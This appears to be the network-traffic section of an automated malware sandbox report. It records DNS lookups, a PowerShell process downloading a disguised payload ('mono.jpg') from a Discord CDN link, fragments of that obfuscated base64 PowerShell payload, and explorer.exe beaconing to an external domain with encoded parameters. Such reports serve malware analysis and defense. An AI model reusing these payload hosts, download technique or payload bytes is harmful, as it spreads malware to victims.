                                      Dec 2, 2021 18:36:08.742738962 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.742791891 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.742865086 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.742908955 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.742918015 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.742958069 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.742964983 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.743016005 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.743016005 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.743027925 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.743066072 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.743112087 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.743144989 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.743155003 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.743161917 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.743195057 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.743201017 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.743241072 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.743242979 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.743253946 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.743280888 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.743293047 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.743510008 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.743561983 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.743571043 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.743608952 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.743616104 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.743654013 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.744333029 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.744421959 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.744468927 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.744474888 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.744484901 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.744508028 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.744538069 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.745127916 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.745191097 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.745198965 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.745251894 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.745259047 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.745270967 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.745325089 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.746018887 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.746084929 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.746094942 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.746140003 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.746143103 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.746154070 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.746197939 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.760741949 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.760802031 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.760823011 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.760870934 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.760900021 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.760981083 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.760988951 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.761038065 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.761044979 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.761099100 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.761113882 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.761118889 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.761152983 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.761173010 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.761177063 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.761244059 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.761517048 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.761578083 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.761583090 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.761629105 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.761632919 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.761693954 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.761698961 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.761754990 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.762403011 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.762455940 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.762481928 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.762538910 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.762553930 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.762595892 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.763242960 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.763300896 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.763345003 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.763403893 CET49165443192.168.2.22162.159.134.233
                                      Dec 2, 2021 18:36:08.764127970 CET44349165162.159.134.233192.168.2.22
                                      Dec 2, 2021 18:36:08.764189959 CET49165443192.168.2.22162.159.134.233

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 2, 2021 18:36:07.268759012 CET5216753192.168.2.228.8.8.8
                                      Dec 2, 2021 18:36:07.296899080 CET53521678.8.8.8192.168.2.22
                                      Dec 2, 2021 18:36:07.303762913 CET5059153192.168.2.228.8.8.8
                                      Dec 2, 2021 18:36:07.323771954 CET53505918.8.8.8192.168.2.22
                                      Dec 2, 2021 18:36:08.210330963 CET5780553192.168.2.228.8.8.8
                                      Dec 2, 2021 18:36:08.231599092 CET53578058.8.8.8192.168.2.22
                                      Dec 2, 2021 18:36:08.232462883 CET5780553192.168.2.228.8.8.8
                                      Dec 2, 2021 18:36:08.251946926 CET53578058.8.8.8192.168.2.22
                                      Dec 2, 2021 18:37:33.942559958 CET5903053192.168.2.228.8.8.8
                                      Dec 2, 2021 18:37:33.973216057 CET53590308.8.8.8192.168.2.22
                                      Dec 2, 2021 18:37:52.341738939 CET5918553192.168.2.228.8.8.8
                                      Dec 2, 2021 18:37:52.380984068 CET53591858.8.8.8192.168.2.22

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                      Dec 2, 2021 18:36:07.268759012 CET192.168.2.228.8.8.80x9e6Standard query (0)google.comA (IP address)IN (0x0001)
                                      Dec 2, 2021 18:36:07.303762913 CET192.168.2.228.8.8.80x782aStandard query (0)google.comA (IP address)IN (0x0001)
                                      Dec 2, 2021 18:36:08.210330963 CET192.168.2.228.8.8.80x4b6fStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                      Dec 2, 2021 18:36:08.232462883 CET192.168.2.228.8.8.80x4b6fStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                      Dec 2, 2021 18:37:33.942559958 CET192.168.2.228.8.8.80xc18cStandard query (0)www.eminkoy.comA (IP address)IN (0x0001)
                                      Dec 2, 2021 18:37:52.341738939 CET192.168.2.228.8.8.80xfc43Standard query (0)www.towne-kitchen.comA (IP address)IN (0x0001)

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                      Dec 2, 2021 18:36:07.296899080 CET8.8.8.8192.168.2.220x9e6No error (0)google.com172.217.168.14A (IP address)IN (0x0001)
                                      Dec 2, 2021 18:36:07.323771954 CET8.8.8.8192.168.2.220x782aNo error (0)google.com172.217.168.14A (IP address)IN (0x0001)
                                      Dec 2, 2021 18:36:08.231599092 CET8.8.8.8192.168.2.220x4b6fNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                      Dec 2, 2021 18:36:08.231599092 CET8.8.8.8192.168.2.220x4b6fNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                      Dec 2, 2021 18:36:08.231599092 CET8.8.8.8192.168.2.220x4b6fNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                      Dec 2, 2021 18:36:08.231599092 CET8.8.8.8192.168.2.220x4b6fNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                      Dec 2, 2021 18:36:08.231599092 CET8.8.8.8192.168.2.220x4b6fNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                      Dec 2, 2021 18:36:08.251946926 CET8.8.8.8192.168.2.220x4b6fNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                      Dec 2, 2021 18:36:08.251946926 CET8.8.8.8192.168.2.220x4b6fNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                      Dec 2, 2021 18:36:08.251946926 CET8.8.8.8192.168.2.220x4b6fNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                      Dec 2, 2021 18:36:08.251946926 CET8.8.8.8192.168.2.220x4b6fNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                      Dec 2, 2021 18:36:08.251946926 CET8.8.8.8192.168.2.220x4b6fNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                      Dec 2, 2021 18:37:33.973216057 CET8.8.8.8192.168.2.220xc18cNo error (0)www.eminkoy.comeminkoy.comCNAME (Canonical name)IN (0x0001)
                                      Dec 2, 2021 18:37:33.973216057 CET8.8.8.8192.168.2.220xc18cNo error (0)eminkoy.com192.0.78.24A (IP address)IN (0x0001)
                                      Dec 2, 2021 18:37:33.973216057 CET8.8.8.8192.168.2.220xc18cNo error (0)eminkoy.com192.0.78.25A (IP address)IN (0x0001)
                                      Dec 2, 2021 18:37:52.380984068 CET8.8.8.8192.168.2.220xfc43Name error (3)www.towne-kitchen.comnonenoneA (IP address)IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • cdn.discordapp.com
                                      • www.eminkoy.com

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.2249165162.159.134.233443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampkBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      1192.168.2.2249167192.0.78.2480C:\Windows\explorer.exe
                                      TimestampkBytes transferredDirectionData
                                      Dec 2, 2021 18:37:33.998596907 CET1925OUTGET /t3t2/?YTX8m6=X/AHJ1G8CzET27bRNAkcy2zo056pG+X2bUgtrIM6Usdw2LVzhx3zymRQr/cABPSK+z/Wow==&GZS=5jiXYnvXE6 HTTP/1.1
                                      Host: www.eminkoy.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Dec 2, 2021 18:37:34.015444040 CET1926INHTTP/1.1 301 Moved Permanently
                                      Server: nginx
                                      Date: Thu, 02 Dec 2021 17:37:34 GMT
                                      Content-Type: text/html
                                      Content-Length: 162
                                      Connection: close
                                      Location: https://www.eminkoy.com/t3t2/?YTX8m6=X/AHJ1G8CzET27bRNAkcy2zo056pG+X2bUgtrIM6Usdw2LVzhx3zymRQr/cABPSK+z/Wow==&GZS=5jiXYnvXE6
                                      X-ac: 2.hhn _dfw
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.2249165162.159.134.233443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampkBytes transferredDirectionData
                                      2021-12-02 17:36:08 UTC0OUTGET /attachments/915347845752705109/915799800740462662/mono.jpg HTTP/1.1
                                      Accept: */*
                                      UA-CPU: AMD64
                                      Accept-Encoding: gzip, deflate
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2021-12-02 17:36:08 UTC0INHTTP/1.1 200 OK
                                      Date: Thu, 02 Dec 2021 17:36:08 GMT
                                      Content-Type: image/jpeg
                                      Content-Length: 1920730
                                      Connection: close
                                      CF-Ray: 6b7650d65d904edf-FRA
                                      Accept-Ranges: bytes
                                      Age: 26113
                                      Cache-Control: public, max-age=31536000
                                      ETag: "715fb9aa84b3e1c2f82643aa678b63dc"
                                      Expires: Fri, 02 Dec 2022 17:36:08 GMT
                                      Last-Modified: Thu, 02 Dec 2021 03:01:27 GMT
                                      CF-Cache-Status: HIT
                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                      Cf-Bgj: h2pri
                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                      x-goog-generation: 1638414087319322
                                      x-goog-hash: crc32c=W/97YQ==
                                      x-goog-hash: md5=cV+5qoSz4cL4JkOqZ4tj3A==
                                      x-goog-metageneration: 1
                                      x-goog-storage-class: STANDARD
                                      x-goog-stored-content-encoding: identity
                                      x-goog-stored-content-length: 1920730
                                      X-GUploader-UploadID: ADPycds_kd9cBeOUt_en4NG8zlRRTmBoLMmrxWbzsDJ2FgldRqFGd3xZNz4E-qZsmyuXBRhO6M8D188VxklIjPRcols
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0vGSQlV1G1HizlW8lmTzG2s7I6HXN8DL%2FbbCKYKgsigH1FBKSKG%2FASqYH53PV2X%2FeoT6ZZoA7GSXO2GjUvgOMsg5EzSukwPKWmp3SO1vScQxa8EDYgmb3yOlDgBoc2Yliz85cg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      2021-12-02 17:36:08 UTC1INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                      Data Ascii: Server: cloudflare
                                      2021-12-02 17:36:08 UTC1INData Raw: 56 33 4a 70 64 47 55 74 56 6d 56 79 59 6d 39 7a 5a 53 41 69 52 32 56 30 4c 55 52 6c 59 32 39 74 63 48 4a 6c 63 33 4e 6c 5a 45 4a 35 64 47 56 42 63 6e 4a 68 65 53 49 37 4a 47 45 39 4a 47 45 39 56 33 4a 70 64 47 55 74 53 47 39 7a 64 43 41 6e 65 7a 49 33 4f 44 45 33 4e 6a 46 46 4c 54 49 34 52 54 41 74 4e 44 45 77 4f 53 30 35 4f 55 5a 46 4c 55 49 35 52 44 45 79 4e 30 4d 31 4e 30 46 47 52 58 30 6e 4f 31 64 79 61 58 52 6c 4c 56 5a 6c 63 6d 4a 76 63 32 55 67 49 6b 64 6c 64 43 31 45 5a 57 4e 76 62 58 42 79 5a 58 4e 7a 5a 57 52 43 65 58 52 6c 51 58 4a 79 59 58 6b 69 4f 79 52 68 50 53 52 68 50 56 64 79 61 58 52 6c 4c 55 68 76 63 33 51 67 4a 33 73 79 4e 7a 67 78 4e 7a 59 78 52 53 30 79 4f 45 55 77 4c 54 51 78 4d 44 6b 74 4f 54 6c 47 52 53 31 43 4f 55 51 78 4d 6a 64
                                      Data Ascii: V3JpdGUtVmVyYm9zZSAiR2V0LURlY29tcHJlc3NlZEJ5dGVBcnJheSI7JGE9JGE9V3JpdGUtSG9zdCAnezI3ODE3NjFFLTI4RTAtNDEwOS05OUZFLUI5RDEyN0M1N0FGRX0nO1dyaXRlLVZlcmJvc2UgIkdldC1EZWNvbXByZXNzZWRCeXRlQXJyYXkiOyRhPSRhPVdyaXRlLUhvc3QgJ3syNzgxNzYxRS0yOEUwLTQxMDktOTlGRS1COUQxMjd
                                      2021-12-02 17:36:08 UTC3INData Raw: 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 49 67 30 4b 56 33 4a 70 64 47 55 74 53 47 39 7a 64 43 41 69 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69
                                      Data Ascii: qKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqIg0KV3JpdGUtSG9zdCAiKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKi
                                      2021-12-02 17:36:08 UTC4INData Raw: 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 49 67 30 4b 56 33 4a 70 64 47 55 74 53 47 39 7a 64 43 41 69 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f
                                      Data Ascii: KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqIg0KV3JpdGUtSG9zdCAiKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKio
                                      2021-12-02 17:36:08 UTC5INData Raw: 47 42 43 52 53 78 67 52 6a 67 73 59 45 45 35 4c 47 41 7a 52 69 78 67 52 54 6b 73 59 45 51 33 4c 47 42 47 4f 43 78 67 51 6a 55 73 59 44 64 47 4c 47 41 34 52 43 78 67 4e 55 59 73 59 45 55 7a 4c 47 42 45 4e 79 78 67 52 6a 67 73 59 44 63 31 4c 47 42 46 4f 43 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 47 4e 79 78 67 52 6b 59 73 59 45 5a 45 4c 47 41 32 51 69 78 67 52 6b 4d 73 59 44 46 42 4c 47 41 33 52 69 78 67 52 44 63 73 59 45 46 47 4c 47 41 79 4d 53 78 67 51 30 59 73 59 45 56 47 4c 47 42 42 4f 53 78 67 4d 30 59 73 59 44 4d 33 4c 47 41 7a 52 43 78 67 4e 30 59 73 59 44 45 77 4c 47 42 47 52 43 78 67 52 6b 59 73 59 44 4d 33 4c 47 42 47 4f 53 78 67 4e 55 51 73 59 45 5a 46 4c 47 41 35 52 53 78 67 52 45 59 73 59 45 55 30 4c 47 42 45 4e 79 78 67 52 6a 67 73 59 45 52 43
                                      Data Ascii: GBCRSxgRjgsYEE5LGAzRixgRTksYEQ3LGBGOCxgQjUsYDdGLGA4RCxgNUYsYEUzLGBENyxgRjgsYDc1LGBFOCxgRkYsYEZGLGBGNyxgRkYsYEZELGA2QixgRkMsYDFBLGA3RixgRDcsYEFGLGAyMSxgQ0YsYEVGLGBBOSxgM0YsYDM3LGAzRCxgN0YsYDEwLGBGRCxgRkYsYDM3LGBGOSxgNUQsYEZFLGA5RSxgREYsYEU0LGBENyxgRjgsYERC
                                      2021-12-02 17:36:08 UTC7INData Raw: 67 73 59 44 64 47 4c 47 41 32 4d 43 78 67 4e 44 63 73 59 45 4e 43 4c 47 42 44 52 69 78 67 52 55 59 73 59 44 51 35 4c 47 42 47 52 69 78 67 4d 55 49 73 59 45 51 33 4c 47 41 33 4f 53 78 67 4e 54 6b 73 59 44 55 78 4c 47 41 30 4d 79 78 67 51 7a 59 73 59 44 4d 31 4c 47 41 31 4e 53 78 67 4d 55 45 73 59 45 5a 44 4c 47 41 78 4e 79 78 67 51 6b 51 73 59 44 63 32 4c 47 41 30 52 69 78 67 4f 44 49 73 59 44 42 47 4c 47 42 46 4f 43 78 67 4e 54 6b 73 59 45 5a 45 4c 47 42 46 52 69 78 67 52 44 49 73 59 45 55 32 4c 47 42 45 51 69 78 67 51 6b 59 73 59 44 41 32 4c 47 41 31 52 53 78 67 52 6a 6b 73 59 44 63 31 4c 47 41 33 52 69 78 67 4f 45 51 73 59 44 5a 47 4c 47 42 47 52 69 78 67 4d 30 55 73 59 45 4a 47 4c 47 42 47 4e 69 78 67 51 55 59 73 59 45 59 78 4c 47 42 43 52 69 78 67 52
                                      Data Ascii: gsYDdGLGA2MCxgNDcsYENCLGBDRixgRUYsYDQ5LGBGRixgMUIsYEQ3LGA3OSxgNTksYDUxLGA0MyxgQzYsYDM1LGA1NSxgMUEsYEZDLGAxNyxgQkQsYDc2LGA0RixgODIsYDBGLGBFOCxgNTksYEZELGBFRixgRDIsYEU2LGBEQixgQkYsYDA2LGA1RSxgRjksYDc1LGA3RixgOEQsYDZGLGBGRixgM0UsYEJGLGBGNixgQUYsYEYxLGBCRixgR
                                      2021-12-02 17:36:08 UTC8INData Raw: 47 4f 53 78 67 4d 6a 4d 73 59 44 41 35 4c 47 41 31 52 53 78 67 4e 45 55 73 59 44 55 30 4c 47 41 35 4f 53 78 67 4e 54 41 73 59 44 64 47 4c 47 42 47 52 69 78 67 4d 6a 49 73 59 45 49 31 4c 47 42 47 52 69 78 67 4e 7a 63 73 59 45 55 35 4c 47 42 47 4e 79 78 67 4e 55 59 73 59 44 6c 43 4c 47 42 43 52 53 78 67 52 6b 49 73 59 44 5a 47 4c 47 42 46 4f 43 78 67 52 6a 4d 73 59 44 64 47 4c 47 41 35 4d 43 78 67 4e 6a 41 73 59 45 4a 45 4c 47 41 77 4d 53 78 67 4e 6b 51 73 59 45 55 34 4c 47 42 45 52 43 78 67 52 54 59 73 59 44 4d 33 4c 47 42 47 4f 43 78 67 4d 7a 55 73 59 44 64 46 4c 47 41 34 52 43 78 67 52 6b 59 73 59 44 6c 45 4c 47 42 47 52 53 78 67 52 6b 59 73 59 44 67 32 4c 47 41 7a 52 53 78 67 52 6b 49 73 59 45 59 7a 4c 47 42 42 4f 43 78 67 51 30 51 73 59 44 4d 78 4c 47
                                      Data Ascii: GOSxgMjMsYDA5LGA1RSxgNEUsYDU0LGA5OSxgNTAsYDdGLGBGRixgMjIsYEI1LGBGRixgNzcsYEU5LGBGNyxgNUYsYDlCLGBCRSxgRkIsYDZGLGBFOCxgRjMsYDdGLGA5MCxgNjAsYEJELGAwMSxgNkQsYEU4LGBERCxgRTYsYDM3LGBGOCxgMzUsYDdFLGA4RCxgRkYsYDlELGBGRSxgRkYsYDg2LGAzRSxgRkIsYEYzLGBBOCxgQ0QsYDMxLG
                                      2021-12-02 17:36:08 UTC9INData Raw: 59 44 56 43 4c 47 41 7a 52 69 78 67 4f 45 55 73 59 45 52 47 4c 47 41 7a 52 69 78 67 4d 6a 4d 73 59 44 55 34 4c 47 41 34 52 69 78 67 4e 30 59 73 59 45 56 42 4c 47 41 7a 4e 79 78 67 52 6b 59 73 59 44 4a 44 4c 47 41 7a 51 69 78 67 52 6a 67 73 59 45 49 31 4c 47 42 45 4d 43 78 67 52 54 55 73 59 44 6c 47 4c 47 42 47 4d 69 78 67 52 44 63 73 59 45 5a 47 4c 47 42 45 4e 43 78 67 51 6b 59 73 59 44 6c 46 4c 47 42 47 52 53 78 67 51 6a 55 73 59 44 64 47 4c 47 42 44 4e 43 78 67 4f 55 59 73 59 45 59 32 4c 47 41 30 4e 79 78 67 52 6a 6b 73 59 44 56 45 4c 47 42 47 52 53 78 67 4e 54 59 73 59 45 4a 47 4c 47 41 30 4d 53 78 67 52 6b 45 73 59 45 56 43 4c 47 42 47 51 79 78 67 4e 55 55 73 59 45 5a 47 4c 47 42 47 4f 43 78 67 52 55 59 73 59 45 59 77 4c 47 42 47 51 69 78 67 4d 44 41
                                      Data Ascii: YDVCLGAzRixgOEUsYERGLGAzRixgMjMsYDU4LGA4RixgN0YsYEVBLGAzNyxgRkYsYDJDLGAzQixgRjgsYEI1LGBEMCxgRTUsYDlGLGBGMixgRDcsYEZGLGBENCxgQkYsYDlFLGBGRSxgQjUsYDdGLGBDNCxgOUYsYEY2LGA0NyxgRjksYDVELGBGRSxgNTYsYEJGLGA0MSxgRkEsYEVCLGBGQyxgNUUsYEZGLGBGOCxgRUYsYEYwLGBGQixgMDA
